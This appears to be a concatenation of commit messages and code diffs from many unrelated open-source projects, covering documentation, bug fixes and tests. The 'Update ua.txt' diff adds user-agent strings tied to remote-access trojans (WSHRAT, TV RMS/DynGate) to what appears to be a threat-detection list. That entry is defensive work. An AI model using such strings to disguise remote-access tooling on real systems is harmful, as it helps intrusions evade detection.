@@ -127,6 +127,13 @@ def main(): recurse_not.append(arg[len("recurse_not:"):]) del args[count] + recurse_to = [] + + for count, arg in reversed(tuple(enumerate(args))): + if arg.startswith("recurse_to:"): + recurse_to.append(arg[len("recurse_to:"):]) + del args[count] + if args: sys.exit("Error, non understood mode(s) '%s'," % ','.join(args))
Fix installation step to make it more neutral This is a followup of
@@ -37,13 +37,19 @@ Try the Koalas 10 minutes tutorial on a live Jupyter notebook [here](https://myb ## Getting Started -Koalas can be installed as below: +Koalas can be installed in many ways such as Conda and pip. ```bash +# Conda +conda install koalas -c conda-forge +``` + +```bash +# pip pip install koalas ``` -Koalas can also be installed in many ways such as Conda. See [Installation](https://koalas.readthedocs.io/en/latest/getting_started/install.html) for full instructions to install Koalas. +See [Installation](https://koalas.readthedocs.io/en/latest/getting_started/install.html) for more details. If you are a Databricks Runtime user, you can install Koalas using the Libraries tab on the cluster UI, or using `dbutils` in a notebook as below for the regular Databricks Runtime, @@ -52,16 +58,16 @@ dbutils.library.installPyPI("koalas") dbutils.library.restartPython() ``` -or using `conda` with `--no-deps` option for Databricks Runtime for Machine Learning 6.0 and above, which provides all the required libraries. +For Databricks Runtime for Machine Learning 6.0 and above, you can install it as follows. ```sh %sh -conda install koalas -c conda-forge --no-deps +pip install koalas ``` Note that Koalas requires Databricks Runtime 5.x or above. In the future, we will package Koalas out-of-the-box in both the regular Databricks Runtime and Databricks Runtime for Machine Learning. -Lastly, note that if your PyArrow version is 0.15+ and your PySpark version is lower than 3.0, it is best for you to set `ARROW_PRE_0_15_IPC_FORMAT` environment variable to `1` manually. +Lastly, if your PyArrow version is 0.15+ and your PySpark version is lower than 3.0, it is best for you to set `ARROW_PRE_0_15_IPC_FORMAT` environment variable to `1` manually. Koalas will try its best to set it for you but it is impossible to set it if there is a Spark context already launched. Now you can turn a pandas DataFrame into a Koalas DataFrame that is API-compliant with the former:
Update dmsp_ivm.py Updated variable name for madrigal download method
@@ -155,7 +155,7 @@ def download(date_array, tag='', sat_id='', data_path=None, user=None, The affiliation field is set to pysat to enable tracking of pysat downloads. """ - mad_meth.download(date_array, inst_code=str(madrigal_inst_code), + mad_meth.download(date_array, inst_code=str(madrigal_inst_tag), kindat=str(madrigal_tag[sat_id][tag]), data_path=data_path, user=user, password=password)
Cleanup artifacts of earlier fixes Only remove 'vcs+' pattern from URI in convert_deps_from_pip if the requirement uri explicitly begins with requirement.vcs+
@@ -45,7 +45,7 @@ specifiers = [k for k in lookup.keys()] # List of version control systems we support. VCS_LIST = ('git', 'svn', 'hg', 'bzr') -SCHEME_LIST = ('http://', 'https://', 'ftp://', 'file://', 'git://') +SCHEME_LIST = ('http://', 'https://', 'ftp://', 'file://') requests = requests.Session() @@ -661,10 +661,10 @@ def convert_deps_from_pip(dep): req.path = None # Crop off the git+, etc part. - if '+' in req.uri: + if req.uri.startswith('{0}+'.format(req.vcs)): req.uri = req.uri[len(req.vcs) + 1:] dependency.setdefault(req.name, {}).update({req.vcs: req.uri}) - print('dependency: {}'.format(dependency)) + # Add --editable, if it's there. if req.editable: dependency[req.name].update({'editable': True})
RandomUI : Adapt _RandomColorPlugValueWidget to new PlugValueWidget API This means we now have proper error handling, and the computation of values is being done asynchronously.
@@ -175,6 +175,8 @@ Gaffer.Metadata.registerNode( class _RandomColorPlugValueWidget( GafferUI.PlugValueWidget ) : + __gridSize = imath.V2i( 10, 3 ) + def __init__( self, plug, **kw ) : self.__grid = GafferUI.GridContainer( spacing = 4 ) @@ -182,22 +184,41 @@ class _RandomColorPlugValueWidget( GafferUI.PlugValueWidget ) : GafferUI.PlugValueWidget.__init__( self, self.__grid, plug, **kw ) with self.__grid : - for x in range( 0, 10 ) : - for y in range( 0, 3 ) : + for x in range( 0, self.__gridSize.x ) : + for y in range( 0, self.__gridSize.y ) : GafferUI.ColorSwatch( parenting = { "index" : ( x, y ) } ) - self._updateFromPlug() - - def _updateFromPlug( self ) : + @staticmethod + def _valuesForUpdate( plugs ) : - node = self.getPlug().source().node() + node = next( iter( plugs ) ).source().node() seed = node["seed"].getValue() - gridSize = self.__grid.gridSize() - for x in range( 0, gridSize.x ) : - for y in range( 0, gridSize.y ) : - self.__grid[x,y].setColor( node.randomColor( seed ) ) + result = [] + for x in range( 0, _RandomColorPlugValueWidget.__gridSize.x ) : + column = [] + for y in range( 0, _RandomColorPlugValueWidget.__gridSize.y ) : + column.append( node.randomColor( seed ) ) seed += 1 + result.append( column ) + + return result + + def _updateFromValues( self, values, exception ) : + + for x in range( 0, self.__gridSize.x ) : + for y in range( 0, self.__gridSize.y ) : + if exception is not None : + self.__grid[x,y].setColor( imath.Color3f( 1, 0.33, 0.33 ) ) + elif len( values ) : + self.__grid[x,y].setColor( values[x][y] ) + else : + # We are called with `values == []` prior to + # the BackgroundTask for `_valuesForUpdate()` + # being launched. No point displaying a "busy" + # state as it is typically so quick as to just + # be visual noise. + pass # PlugValueWidget popup menu ##########################################################################
Fixing a race in miner submit_work Issue
@@ -279,8 +279,9 @@ class Miner: if header_hash not in self.work_map: return False - block = self.work_map[header_hash] - header = copy.copy(block.header) + # this copy is necessary since there might be multiple submissions concurrently + block = copy.copy(self.work_map[header_hash]) + header = block.header header.nonce, header.mixhash = nonce, mixhash # lower the difficulty for root block signed by guardian @@ -297,10 +298,10 @@ class Miner: validate_seal(header, self.consensus_type) except ValueError: return False - - block.header = header # actual update try: await self.add_block_async_func(block) + # a previous submission of the same work could have removed the key + if header_hash in self.work_map: del self.work_map[header_hash] self.current_work = None return True
Disable flaky tests in dist_autograd_test Summary: Pull Request resolved: Test Plan: Imported from OSS
@@ -379,6 +379,7 @@ class DistAutogradTest(object): def test_graph_for_builtin_remote_call(self): self._test_graph(torch.add, ExecMode.REMOTE) + @unittest.skip("Test is flaky, see https://github.com/pytorch/pytorch/issues/28885") @dist_init def test_graph_for_python_remote_call(self): self._test_graph(my_py_add, ExecMode.REMOTE) @@ -851,6 +852,7 @@ class DistAutogradTest(object): # # These four test ps-trainer groups run on completely separate autograd # graphs, but they share the same set of underlying RpcAgents. + @unittest.skip("Test is flaky, see https://github.com/pytorch/pytorch/issues/28874") @dist_init def test_trainer_ps(self): local_grads = None
Bug fix for multi-level display in BOM table Multi-level BOM loading was broken Using the wrong column name for 'treeShowField' Also adds functionality to auto-expand sub-part when loading
@@ -812,7 +812,7 @@ function loadBomTable(table, options={}) { // Part column cols.push( { - field: 'sub_part_detail.full_name', + field: 'sub_part', title: '{% trans "Part" %}', sortable: true, switchable: false, @@ -1194,12 +1194,15 @@ function loadBomTable(table, options={}) { response[idx].parentId = bom_pk; } - var row = $(table).bootstrapTable('getRowByUniqueId', bom_pk); + var row = table.bootstrapTable('getRowByUniqueId', bom_pk); row.sub_assembly_received = true; - $(table).bootstrapTable('updateByUniqueId', bom_pk, row, true); + table.bootstrapTable('updateByUniqueId', bom_pk, row, true); table.bootstrapTable('append', response); + + // Auto-expand the newly added row + $(`.treegrid-${bom_pk}`).treegrid('expand'); }, error: function(xhr) { console.error('Error requesting BOM for part=' + part_pk); @@ -1252,28 +1255,39 @@ function loadBomTable(table, options={}) { table.treegrid({ treeColumn: 1, - onExpand: function() { - } }); table.treegrid('collapseAll'); // Callback for 'load sub assembly' button - $(table).find('.load-sub-assembly').click(function(event) { + table.find('.load-sub-assembly').click(function(event) { event.preventDefault(); var pk = $(this).attr('pk'); - var row = $(table).bootstrapTable('getRowByUniqueId', pk); + var row = table.bootstrapTable('getRowByUniqueId', pk); // Request BOM data for this subassembly requestSubItems(row.pk, row.sub_part); row.sub_assembly_requested = true; - $(table).bootstrapTable('updateByUniqueId', pk, row, true); + table.bootstrapTable('updateByUniqueId', pk, row, true); }); + + var data = table.bootstrapTable('getData'); + + for (var idx = 0; idx < data.length; idx++) { + var row = data[idx]; + + if (!row.parentId) { + row.parentId = parent_id; + + table.bootstrapTable('updateByUniqueId', row.pk, row, true); + } + } }, - onLoadSuccess: function() { + onLoadSuccess: function(data) { + if (options.editable) { table.bootstrapTable('uncheckAll'); }
Update ncbi-covid-19.yaml updated the description
Name: COVID-19 Genome Sequence Dataset -Description: A centralized sequence repository for all strains of novel corona virus (SARS-CoV-2) submitted to the National Center for Biotechnology Information (NCBI). Included are both the original sequences submitted by the principal investigator as well as SRA-processed sequences that require the SRA Toolkit for analysis. +Description: A centralized sequence repository for all records containing sequence associated with the novel corona virus (SARS-CoV-2) submitted to the National Center for Biotechnology Information (NCBI) Sequence Read Archive (SRA). Included are both the original sequences submitted by the principal investigator as well as SRA-processed sequences that require the SRA Toolkit for analysis. Additionally, submitter provided metadata included in associated BioSample and BioProject records is available alongside NCBI calculated data, such k-mer based taxonomy analysis results, contiguous assemblies (contigs) and associated statistics such as contig length, blast results for the assembled contigs, contig annotation, blast databases of contigs and their annotated peptides, and VCF files generated for each record relative to the SARS-CoV-2 RefSeq record. Finally, metadata is additionally made available in parquet format to facilitate search and filtering using the AWS Athena Service. Documentation: https://www.ncbi.nlm.nih.gov/sra/docs/sra-aws-download/ Contact: https://support.nlm.nih.gov/support/create-case/ ManagedBy: "[National Library of Medicine (NLM)](http://nlm.nih.gov/)"
Mazda: Add 2023 CX9 fw * Mazda: Add 2023 CX9 fw DongleID: Discord User: bsk#7841 * Attempt to steer below 28mph for CX9 * undo comment
@@ -283,6 +283,7 @@ FW_VERSIONS = { b'TC3M-3210X-A-00\x00\x00\x00\x00\x00\x00\x00\x00\x00', ], (Ecu.engine, 0x7e0, None): [ + b'PXGW-188K2-C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PXM4-188K2-C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PXM4-188K2-D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'PXM6-188K2-E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', @@ -299,6 +300,7 @@ FW_VERSIONS = { b'GSH7-67XK2-N\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'GSH7-67XK2-P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'GSH7-67XK2-S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', + b'GSH7-67XK2-T\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', ], (Ecu.transmission, 0x7e1, None): [ b'PXM4-21PS1-B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
Update ua.txt See also old ```apt_tvrms.txt```.
@@ -884,3 +884,8 @@ Mozilla/5.0 (Windows NT 10.0; &) # Reference: https://twitter.com/luc4m/status/1166765980489584640 WSHRAT + +# Reference: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/01075510/TV_RMS_IoC_eng.pdf + +Mozilla/4.0 (compatible; RMS) +Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Increase number of samples for testing distributions * Increase number of samples for testing distributions * remove flaky annotation * Update test_distribution_sampling.py Removed import.
import mxnet as mx import numpy as np import pytest -from flaky import flaky # First-party imports from gluonts.distribution import ( @@ -86,7 +85,6 @@ DISTRIBUTIONS_WITH_CDF = [Gaussian, Uniform, Laplace, Binned] DISTRIBUTIONS_WITH_QUANTILE_FUNCTION = [Gaussian, Uniform, Laplace, Binned] -@flaky(max_runs=3) @pytest.mark.parametrize("distr_class, params", test_cases) @pytest.mark.parametrize("serialize_fn", serialize_fn_list) def test_sampling(distr_class, params, serialize_fn) -> None: @@ -94,14 +92,16 @@ def test_sampling(distr_class, params, serialize_fn) -> None: distr = serialize_fn(distr) samples = distr.sample() assert samples.shape == (2,) - num_samples = 100_000 + num_samples = 1_000_000 samples = distr.sample(num_samples) assert samples.shape == (num_samples, 2) np_samples = samples.asnumpy() + # avoid accuracy issues with float32 when calculating std + # see https://github.com/numpy/numpy/issues/8869 + np_samples = np_samples.astype(np.float64) assert np.isfinite(np_samples).all() - assert np.allclose( np_samples.mean(axis=0), distr.mean.asnumpy(), atol=1e-2, rtol=1e-2 )
fail silently on piexif errors since errors are not handled currently the server do not respond
@@ -292,7 +292,11 @@ class BaseEngine(object): exif_dict = self._get_exif_segment() if exif_dict and piexif.ImageIFD.Orientation in exif_dict["0th"]: exif_dict["0th"][piexif.ImageIFD.Orientation] = 1 + try: self.exif = piexif.dump(exif_dict) + except Exception as e: + msg = """[piexif] %s""" % e + logger.error(msg) def gen_image(self, size, color): raise NotImplementedError()
[NixIO] Read and write channel_ids of ChannelIndex Fixes
@@ -262,8 +262,11 @@ class NixIO(BaseIO): for c in nix_source.sources if c.type == "neo.channelindex") chan_names = list(c["neo_name"] for c in chx if "neo_name" in c) + chan_ids = list(c["channel_id"] for c in chx if "channel_id" in c) if chan_names: neo_attrs["channel_names"] = chan_names + if chan_ids: + neo_attrs["channel_ids"] = chan_ids neo_attrs["index"] = np.array([c["index"] for c in chx]) if "coordinates" in chx[0]: coord_units = chx[0]["coordinates.units"] @@ -685,10 +688,13 @@ class NixIO(BaseIO): ) nixchan.definition = nixsource.definition chanmd = nixchan.metadata + chanmd["index"] = nix.Value(int(channel)) if len(chx.channel_names): neochanname = stringify(chx.channel_names[idx]) chanmd["neo_name"] = nix.Value(neochanname) - chanmd["index"] = nix.Value(int(channel)) + if len(chx.channel_ids): + chanid = chx.channel_ids[idx] + chanmd["channel_id"] = nix.Value(chanid) if chx.coordinates is not None: coords = chx.coordinates[idx] coordunits = stringify(coords[0].dimensionality)
Remove references not cited Related to
@@ -80,29 +80,6 @@ year = {2019}, url = {https://bokeh.org/}, } -@book{vance2010machinery, - title={Machinery vibration and rotordynamics}, - author={Vance, John M and Zeidan, Fouad Y and Murphy, Brian G}, - year={2010}, - publisher={John Wiley \& Sons}, - doi={10.1002/9780470903704}, -} - -@book{childs1993turbomachinery, - title={Turbomachinery rotordynamics: phenomena, modeling, and analysis}, - author={Childs, Dara}, - year={1993}, - publisher={John Wiley \& Sons} -} - -@book{ishida2012linear, - title={Linear and nonlinear rotordynamics}, - author={Ishida, Yukio and Yamamoto, Toshio}, - year={2012}, - publisher={Wiley Online Library}, - doi={10.1002/9783527651894}, -} - @book{lalanne1998rotordynamics, title={Rotordynamics prediction in engineering}, author={Lalanne, Michel and Ferraris, Guy}, @@ -111,15 +88,6 @@ url = {https://bokeh.org/}, publisher={Wiley} } -@book{gasch2006rotordynamik, - title={Rotordynamik}, - author={Gasch, Robert and Nordmann, Rainer and Pf{\"u}tzner, Herbert}, - year={2006}, - publisher={Springer}, - url={https://doi.org/10.1007/978-3-662-09786-1}, - doi={10.1007/978-3-662-09786-1}, -} - @misc{comsol, title={COMSOL - {Rotordynamics Module}}, year = {2019},
ENH: more refinements on summary_logs [CHANGED] find start of the last exception traceback and display that
@@ -761,18 +761,22 @@ class ReadOnlyTinyDbDataStore(ReadOnlyDataStoreBase): @property def summary_incomplete(self): """returns a table summarising incomplete results""" + # detect last exception line + err_pat = re.compile(r"[A-Z][a-z]+[A-Z][a-z]+\:.+") types = defaultdict(list) indices = "type", "origin" for member in self.incomplete: record = member.read() record = deserialise_not_completed(record) key = tuple(getattr(record, k, None) for k in indices) - types[key].append([record.message, record.source]) + match = err_pat.findall(record.message) + types[key].append([match[-1] if match else record.message, record.source]) header = list(indices) + ["message", "num", "source"] rows = [] maxtring = reprlib.aRepr.maxstring reprlib.aRepr.maxstring = 45 + for record in types: messages, sources = list(zip(*types[record])) messages = reprlib.repr(
Create a snapshot from a in-use volume with force=False In order to test the interface of "force=False", and distinguish with "force=True". If the interface is "force=True", we can create a snapshot from a in-use volume successfully.
@@ -16,6 +16,7 @@ from tempest.api.volume import base from tempest import config from tempest.lib.common.utils import data_utils from tempest.lib import decorators +from tempest.lib import exceptions as lib_exc from tempest import test CONF = config.CONF @@ -42,6 +43,10 @@ class VolumesSnapshotTestJSON(base.BaseVolumeTest): server = self.create_server(wait_until='ACTIVE') self.attach_volume(server['id'], self.volume_origin['id']) + # Snapshot a volume which attached to an instance with force=False + self.assertRaises(lib_exc.BadRequest, self.create_snapshot, + self.volume_origin['id'], force=False) + # Snapshot a volume even if it's attached to an instance snapshot = self.create_snapshot(self.volume_origin['id'], force=True)
Fix concatenation TypeError in code_sentences Fixes
@@ -3197,8 +3197,10 @@ class DialogCodeText(QtWidgets.QWidget): self.autocode_history.insert(0, undo_dict) self.parent_textEdit.append(_("Automatic code sentence in files:") \ + _("\nCode: ") + item.text(0) - + _("\nWith text fragment: ") + text + _( - "\nUsing line ending: ") + ending + "\n" + msg) + + _("\nWith text fragment: ") + + text.decode("utf-8") + + _("\nUsing line ending: ") + + ending + "\n" + msg) self.app.delete_backup = False # Update tooltip filter and code tree code counts self.get_coded_text_update_eventfilter_tooltips()
fix: setup.cfg was not in MANIFEST.in Add setup.cfg into MANIFEST.in.
@@ -7,6 +7,7 @@ include docs/* include docs/api/*.* include pkg/* include setup.py +include setup.cfg recursive-include src *.py # for f in tests/**/*.* ; do echo ${f/*\./*.}; done | sort | uniq recursive-include tests *.ini *.json *.properties *.py *.sh *.toml *.xml *.yml
Update TsIOCMenu.vue Fix typo
@@ -143,7 +143,7 @@ export default { 'intelligence' ).then(() => { Snackbar.open({ - message: 'Attribtue added successfully', + message: 'Attribute added successfully', type: 'is-white', position: 'is-top', actionText: 'View intelligence',
Fix neutron dhcp log path The neutron dhcp-agent log path is not set properly. The service is logging at /var/log/containers/neutron/dhcp-agent.log and the log is set to /var/log/neutron/dhcp-agent.log
@@ -27,7 +27,7 @@ parameters: type: json default: tag: openstack.neutron.agent.dhcp - path: /var/log/neutron/dhcp-agent.log + path: /var/log/containers/neutron/dhcp-agent.log EndpointMap: default: {} description: Mapping of service endpoint -> protocol. Typically set
`test_devtools_ui` - Test if dash will run when other `before_request` functions has been registered to flask This test validates issue The root of this issue lies in the devtools ui, and only occurs when the devtools ui has been enabled
from time import sleep +import flask import dash_core_components as dcc import dash_html_components as html @@ -224,3 +225,38 @@ def test_dvui006_no_undo_redo(dash_duo): dash_duo.wait_for_text_to_equal("#b", "xyz") dash_duo.wait_for_no_elements("._dash-undo-redo") + + +def test_dvui007_other_before_request_func(dash_thread_server, dash_br): + # won't use `bash_br`, because it expects an dash app, but it gets an static html page. + # we take only the selenium driver from `bash_br`, this driver has already been set-up. + driver = dash_br.driver + + app = dash.Dash(__name__) + app.layout = html.Div( + [html.P(id="just_an_id", children="You should never see this")] + ) + + # create alternative response, for the endpoint '/' + # servering an alternative response, will disable further `before_request` functions e.g. those by dash + @app.server.before_request + def create_an_alternative_response(): + if flask.request.endpoint == "/": + return flask.Response( + '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n' + "<title>Alternative repsonse</title>\n" + '<h1 id="alternative_id">Alternative response header</h1>\n', + 200, + mimetype="text/html", + ) + + dash_thread_server.start( + app, + debug=True, + use_reloader=False, + use_debugger=True, + dev_tools_hot_reload=False, + ) + + driver.get(dash_thread_server.url) + driver.find_element_by_id("alternative_id")
Fix bug in Trio's _read_exactly() This method calls Trio's `receive_some(n)`, which I found out can actually return fewer than `n` bytes. This is only noticeable on large messages (query results of around 80KB triggered the issue). The solution is to call `receive_some(...)` in a loop until `n` bytes has been received.
@@ -237,8 +237,11 @@ class ConnectionInstance: return bytes(buffer) async def _read_exactly(self, num): + data = b'' try: - return await self._stream.receive_some(num) + while len(data) < num: + data += await self._stream.receive_some(num - len(data)) + return data except (trio.BrokenResourceError, trio.ClosedResourceError): self._closed = True
fix: add compatibildity mode for non_standard_message closes
@@ -18,8 +18,16 @@ def print_non_standard(data): format = request.values.get("format", "classic") if format == "json": return jsonify(data) + + if not data: + message = "no results" + result = -1 else: - return jsonify(dict(result=1, message="success", epidata=data)) + message = "success" + result = 1 + if result == -1 and is_compatibility_mode(): + return jsonify(dict(result=result, message=message)) + return jsonify(dict(result=result, message=message, epidata=data)) class APrinter:
Update match.py Reorder order matters
@@ -984,18 +984,18 @@ class ParticipantStats(CassiopeiaObject): def kills(self) -> int: return self._data[ParticipantStatsData].kills - @load_match_on_attributeerror @property + @load_match_on_attributeerror def baron_kills(self) -> int: return self._data[ParticipantStatsData].baronKills - @load_match_on_attributeerror @property + @load_match_on_attributeerror def bounty_level(self) -> int: return self._data[TeamData].bountyLevel - @load_match_on_attributeerror @property + @load_match_on_attributeerror def champion_experience(self) -> int: return self._data[TeamData].championExperience
Fix IDRAC reset URl call For resetting IDRAC the URL must include {"ResetType": "GracefulRestart"} post body. With empty body it get 400 Error
@@ -145,7 +145,8 @@ class Redfish(object): def reset(self): manager_url = self.get_manager_url() reset_url = f"{manager_url}/Actions/Manager.Reset" - request = Request(reset_url, headers=self.headers, method='POST', data=json.dumps({}).encode('utf-8')) + request = Request(reset_url, headers=self.headers, method='POST', + data=json.dumps({"ResetType": "GracefulRestart"}).encode('utf-8')) urlopen(request, context=self.context) def set_iso(self, iso_url):
Remove redundant call to StateToNumber Previously, StateToNumber was called on a vector obtained from v = NumberToState(i), so that StateToNumber(v) == i.
@@ -55,11 +55,9 @@ class DirectMatrixWrapper : public AbstractMatrixWrapper<Operator, WfType> { operator_.FindConn(v, matrix_elements, connectors, newconfs); - const auto numberv = hilbert_index_.StateToNumber(v); - for (size_t k = 0; k < connectors.size(); ++k) { - const auto j = numberv + hilbert_index_.DeltaStateToNumber( - v, connectors[k], newconfs[k]); + const auto j = i + hilbert_index_.DeltaStateToNumber(v, connectors[k], + newconfs[k]); result(i) += matrix_elements[k] * state(j); }
Adapt test_hpylong.py to CPython 3.10 CPython 3.10 does not support types with custom __int__ all of the PyLong_As... methods
@@ -34,6 +34,16 @@ class TestLong(HPyTest): vi = sys.version_info return (vi.major > 3 or (vi.major == 3 and vi.minor >= 8)) + def python_supports_magic_int(self): + """ Return True if the Python version is 3.9 or earlier and thus + should support calling __int__ on non-int based types in some + HPyLong_As... methods. + """ + import sys + vi = sys.version_info + assert vi.major >= 3 + return (vi.major == 3 and vi.minor <= 9) + def test_Long_FromLong(self): mod = self.make_module(""" HPyDef_METH(f, "f", f_impl, HPyFunc_NOARGS) @@ -64,6 +74,7 @@ class TestLong(HPyTest): assert mod.f(45) == 90 with pytest.raises(TypeError): mod.f("this is not a number") + if self.python_supports_magic_int(): assert mod.f(self.magic_int(2)) == 4 if self.python_supports_magic_index(): assert mod.f(self.magic_index(2)) == 4 @@ -123,6 +134,7 @@ class TestLong(HPyTest): assert mod.f(-1) == 2**self.unsigned_long_bits() - 1 with pytest.raises(TypeError): mod.f("this is not a number") + if self.python_supports_magic_int(): assert mod.f(self.magic_int(2)) == 2 if self.python_supports_magic_index(): assert mod.f(self.magic_index(2)) == 2 @@ -159,6 +171,7 @@ class TestLong(HPyTest): assert mod.f(-2147483648) == -2147483648 with pytest.raises(TypeError): mod.f("this is not a number") + if self.python_supports_magic_int(): assert mod.f(self.magic_int(2)) == 2 if self.python_supports_magic_index(): assert mod.f(self.magic_index(2)) == 2 @@ -219,6 +232,7 @@ class TestLong(HPyTest): assert mod.f(-1) == 2**64 - 1 with pytest.raises(TypeError): mod.f("this is not a number") + if self.python_supports_magic_int(): assert mod.f(self.magic_int(2)) == 2 if self.python_supports_magic_index(): assert mod.f(self.magic_index(2)) == 2
Attempt to fix assumed auto-merge deletion This test had a chunk missing from it
@@ -103,6 +103,14 @@ class TestJobEndpoint(ResourceTestCaseMixin, TestCase): post_file = os.path.join('job', 'test', 'posts', 'handle_reopt_error.json') post = json.load(open(post_file, 'r')) + + resp = self.api_client.post('/dev/job/', format='json', data=post) + self.assertHttpCreated(resp) + r = json.loads(resp.content) + run_uuid = r.get('run_uuid') + + resp = self.api_client.get(f'/dev/job/{run_uuid}/results') + r = json.loads(resp.content) assert('errors' in r["messages"].keys()) assert('warnings' in r["messages"].keys()) assert(resp.status_code==400)
Fix unicode error for downloads with unicode filenames. Fixes
@@ -90,7 +90,8 @@ def urlparams(url_, hash=None, **query): New query params will be appended to existing parameters, except duplicate names, which will be replaced. """ - url = django_urlparse(url_) + url = django_urlparse(force_text(url_)) + fragment = hash if hash is not None else url.fragment # Use dict(parse_qsl) so we don't get lists of values.
utils/serializer: Fix exception handling in Python3 Allow for the fact that exceptions do not have a 'message' attribute in Python3.
@@ -231,7 +231,7 @@ class yaml(object): lineno = None if hasattr(e, 'problem_mark'): lineno = e.problem_mark.line # pylint: disable=no-member - raise SerializerSyntaxError(e.message, lineno) + raise SerializerSyntaxError(e.args[0] if e.args else str(e), lineno) loads = load
Update readSettings.py remove old permissions setting from defaults
@@ -116,7 +116,6 @@ class ReadSettings: 'embed-subs': 'True', 'embed-only-internal-subs': 'False', 'sub-providers': '', - 'permissions': '777', 'post-process': 'False', 'pix-fmt': '', 'preopts': '',
Prevent displaying related events dropdown When link query param is present
@@ -480,7 +480,7 @@ class BookRoomModal extends React.Component { disabled={bookingBlocked(fprops)} required /> </Segment> - {this.renderRelatedEventsDropdown(bookingBlocked(fprops), fprops.form.mutators)} + {!link && this.renderRelatedEventsDropdown(bookingBlocked(fprops), fprops.form.mutators)} </Form> {conflictsExist && this.renderBookingConstraints(Object.values(availability.conflicts))} {this.renderBookingState(fprops)}
fix: F821 undefined name 'InternalError' tx flake8
@@ -80,7 +80,7 @@ def return_coordinates(doctype, filters_sql): """SELECT name, latitude, longitude FROM `tab{}` WHERE {}""".format(doctype, filters_sql), as_dict=True, ) - except InternalError: + except frappe.db.InternalError: frappe.msgprint( frappe._("This Doctype does not contain latitude and longitude fields"), raise_exception=True )
Handle version=None when converted to a string it becomes 'None' parm should default to empty string rather than None, it would fix better with existing code.
@@ -1027,7 +1027,7 @@ def install(name=None, refresh=False, pkgs=None, **kwargs): # The user user salt cmdline with version=5.3 might be interpreted # as a float it must be converted to a string in order for # string matching to work. - if not isinstance(version_num, six.string_types): + if not isinstance(version_num, six.string_types) and version_num is not None: version_num = str(version_num) if not version_num: @@ -1363,7 +1363,7 @@ def remove(name=None, pkgs=None, version=None, **kwargs): # The user user salt cmdline with version=5.3 might be interpreted # as a float it must be converted to a string in order for # string matching to work. - if not isinstance(version_num, six.string_types): + if not isinstance(version_num, six.string_types) and version_num is not None: version_num = str(version_num) if version_num not in pkginfo and 'latest' in pkginfo: version_num = 'latest'
Explicitly condition on results of needed jobs. ! failure() returns true for "success", "skipped", and "cancelled"
@@ -24,7 +24,7 @@ concurrency: name: Create conda-based installers for Windows, macOS, and Linux jobs: - build-noarch-conda-pkgs: + build-noarch-pkgs: name: Build ${{ matrix.pkg }} runs-on: ubuntu-latest if: github.event_name != 'release' @@ -96,8 +96,8 @@ jobs: runs-on: ${{ matrix.os }} needs: - build-matrix - - build-noarch-conda-pkgs - if: ${{ ! failure() }} + - build-noarch-pkgs + if: contains(fromJson('["success", "skipped"]'), needs.build-noarch-pkgs.result) && needs.build-matrix.result == 'success' strategy: matrix: target-platform: ${{fromJson(needs.build-matrix.outputs.target_platform)}} @@ -114,7 +114,7 @@ jobs: MACOS_INSTALLER_CERTIFICATE: ${{ secrets.MACOS_INSTALLER_CERTIFICATE }} APPLICATION_PWD: ${{ secrets.APPLICATION_PWD }} CONSTRUCTOR_TARGET_PLATFORM: ${{ matrix.target-platform }} - STATUS: ${{ needs.build-noarch-conda-pkgs.result }} + STATUS: ${{ needs.build-noarch-pkgs.result }} steps: - name: Checkout Code uses: actions/checkout@v3
zulip.scss: Remove dead CSS from 2013. We remove the dead CSS which was introduced in commit back in 2013 and doesn't seem to have any use now. Its probably the case that we removed the actual html structure which used this CSS since 2013 and forgot to clean up the css part.
@@ -855,12 +855,6 @@ td.pointer { border-bottom-left-radius: 3px; } -.message_header .icon-vector-narrow { - font-size: 0.6em; - position: relative; - top: -1px; -} - .copy-paste-text { /* Hide the text that we want copy paste to capture */ position: absolute;
Add deprecation warning for pre_save_duplicate * Add deprecation warning for pre_save_duplicate * Update mixin.py * [pre-commit.ci] auto fixes from pre-commit.com hooks for more information, see
import itertools +import warnings from itertools import repeat from typing import Dict, List, Optional @@ -197,7 +198,20 @@ class CloneMixin(object): pass def pre_save_duplicate(self, instance): # pylint: disable=R0201 - """Override this method to modify the duplicate instance before it's saved.""" + """ + This method has been deprecated and would be removed in the 5.0.0 release. + Please use `pre_clone_save` signal instead. + + See: https://github.com/tj-django/django-clone#signals for guidance. + """ + # TODO: Remove prior to v5.0.0 release + warnings.warn( + "The usage of `pre_save_duplicate` has been deprecated " + "and would be removed in the 5.0.0 release " + "Please use `pre_clone_save` signal instead.", + DeprecationWarning, + stacklevel=2, + ) return instance @transaction.atomic
Added cdipdir_vec. Same as cdipdir but for lists.
@@ -196,6 +196,10 @@ def cdipdir(time_in=None, iyear=None, idoy=None): For time out of interval, computation is made for nearest boundary. Same as SPEDAS cdipdir. """ + if (time_in is None) and (iyear is None) and (idoy is None): + print("Error: No time was provided.") + return + if (iyear is None) or (idoy is None): iyear, idoy, ih, im, isec = get_time_parts(time_in) @@ -253,12 +257,14 @@ def cdipdir(time_in=None, iyear=None, idoy=None): f3 = iyear + (idoy-1)/365.25 - maxind nloop = len(g0) if year1 <= maxind: + # years 1970-2020 g1 = ga[year1] h1 = ha[year1] for i in range(nloop): g[i] = g0[i]*f1 + g1[i]*f2 h[i] = h0[i]*f1 + h1[i]*f2 else: + # years 2020-2025 for i in range(nloop): g[i] = g0[i] + dg[i]*f3 h[i] = h0[i] + dh[i]*f3 @@ -302,7 +308,55 @@ def cdipdir(time_in=None, iyear=None, idoy=None): d2 = sts1 d3 = ct0 - return [d1, d2, d3] + return d1, d2, d3 + + +def cdipdir_vec(time_in=None, iyear=None, idoy=None): + """ + Compute dipole direction in GEO coordinates. + + Similar to cdipdir but for arrays. + + Parameters + ---------- + time_in: list of floats + iyear: list of int + idoy: list of int + + Returns + ------- + list of float + + Notes + ----- + Same as 